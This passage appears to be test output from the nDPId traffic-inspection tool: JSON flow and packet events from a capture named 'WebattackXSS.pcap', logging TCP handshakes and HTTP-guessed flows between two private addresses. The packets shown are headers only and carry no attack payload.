-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1326,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":3,"flow_last_seen":1499347124455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347124455,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NtdAAD4GjwGsEAABwKgKMtJqAFC8CbfTB\/aV\/oAQAOVBxAAAAQEICgE5gQQD41J7"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347125743,"flow_last_seen":1499347125743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347125743,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53880,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1339,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1499347125743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347125743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IcxAAD4GpASsEAABwKgKMtJ4AFAiLqOKAAAAAKACchBDAwAAAgQFtAQCCAoBOYJGAAAAAAEDAwc="} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1340,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1499347125743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347125743,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0niyGNhRIi6ji6AScSBh1wAAAgQFtAQCCAoD41O9ATmCRgEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1341,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1499347125743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347125743,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Ic1AAD4GpAusEAABwKgKMtJ4AFAiLqOLshjYUoAQAOUA3gAAAQEICgE5gkcD41O9"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347128311,"flow_last_seen":1499347128311,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347128311,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1499347128311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347128311,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83+lAAD4G5easEAABwKgKMtKSAFBV0VshAAAAAKACchBVLQAAAgQFtAQCCAoBOYTIAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1355,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1499347128311,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347128311,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0pKrZqcYVdFbIqAScSCpagAAAgQFtAQCCAoD41Y\/ATmEyAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1356,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":3,"flow_last_seen":1499347128312,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347128312,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03+pAAD4G5e2sEAABwKgKMtKSAFBV0Vsiq2anGYAQAOVIcQAAAQEICgE5hMkD41Y\/"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347129584,"flow_last_seen":1499347129584,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129584,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53920,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1366,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1499347129584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347129584,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rtVAAD4GFvusEAABwKgKMtKgAFDfKCjSAAAAAKACchD81wAAAgQFtAQCCAoBOYYHAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1367,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1499347129584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347129584,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0qA\/BA1B3ygo06AScSBWEQAAAgQFtAQCCAoD41d9ATmGBwEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1368,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":3,"flow_last_seen":1499347129585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347129585,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rtZAAD4GFwKsEAABwKgKMtKgAFDfKCjTPwQNQoAQAOX1GAAAAQEICgE5hgcD41d9"} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346994731,"flow_last_seen":1499347000612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346997314,"flow_last_seen":1499347002612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52534,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499346998578,"flow_last_seen":1499347003612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52548,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347001111,"flow_last_seen":1499347006612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347002399,"flow_last_seen":1499347007612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52588,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1375,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347003695,"flow_last_seen":1499347009612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347129648,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347132137,"flow_last_seen":1499347132137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347132137,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1387,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1499347132137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347132137,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8pedAAD4GH+msEAABwKgKMtK6AFAZEC1iAAAAAKACchC7yAAAAgQFtAQCCAoBOYiFAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1388,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1499347132137,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347132137,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0rps\/2\/vGRAtY6AScSCB2QAAAgQFtAQCCAoD41n8ATmIhQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1390,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":3,"flow_last_seen":1499347132138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347132138,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0pehAAD4GH\/CsEAABwKgKMtK6AFAZEC1jbP9v8IAQAOUg4QAAAQEICgE5iIUD41n8"} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347133434,"flow_last_seen":1499347133434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347133434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1396,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1499347133434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347133434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Et1AAD4GsvOsEAABwKgKMtLIAFBRGZsUAAAAAKACchAUuwAAAgQFtAQCCAoBOYnJAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1499347133434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347133434,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0sgnZz2uURmbFaAScSBRYQAAAgQFtAQCCAoD41tAATmJyQEDAwc="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1398,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1499347133435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347133435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Et5AAD4GsvqsEAABwKgKMtLIAFBRGZsVJ2c9r4AQAOXwaAAAAQEICgE5ickD41tA"} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347134702,"flow_last_seen":1499347134702,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347134702,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1499347134702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347134702,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wYFAAD4GBE+sEAABwKgKMtLWAFCOukqHAAAAAKACchAmXAAAAgQFtAQCCAoBOYsGAAAAAAEDAwc="} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1499347134702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347134702,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0tYST2RqjrpKiKAScSBQIQAAAgQFtAQCCAoD41x9ATmLBgEDAwc="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1499347134703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347134703,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wYJAAD4GBFasEAABwKgKMtLWAFCOukqIEk9ka4AQAOXvKAAAAQEICgE5iwYD41x9"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347137239,"flow_last_seen":1499347137239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347137239,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1499347137239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347137239,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iNFAAD4GPP+sEAABwKgKMtLwAFB7ggVRAAAAAKACchB8NgAAAgQFtAQCCAoBOY2AAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":2,"flow_last_seen":1499347137239,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347137239,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0vDqtMDQe4IFUqAScSButQAAAgQFtAQCCAoD4173ATmNgAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":3,"flow_last_seen":1499347137240,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347137240,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iNJAAD4GPQasEAABwKgKMtLwAFB7ggVS6rTA0YAQAOUNvAAAAQEICgE5jYED4173"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347138552,"flow_last_seen":1499347138552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347138552,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1499347138552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347138552,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8erdAAD4GSxmsEAABwKgKMtL+AFByz\/R+AAAAAKACchCUZAAAAgQFtAQCCAoBOY7JAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1439,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1499347138552,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347138552,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ0v61vhLmcs\/0f6AScSBofAAAAgQFtAQCCAoD42A\/ATmOyQEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":3,"flow_last_seen":1499347138553,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347138553,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0erhAAD4GSyCsEAABwKgKMtL+AFByz\/R\/tb4S54AQAOUHhAAAAQEICgE5jskD42A\/"} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1454,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347006233,"flow_last_seen":1499347011612,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347139829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 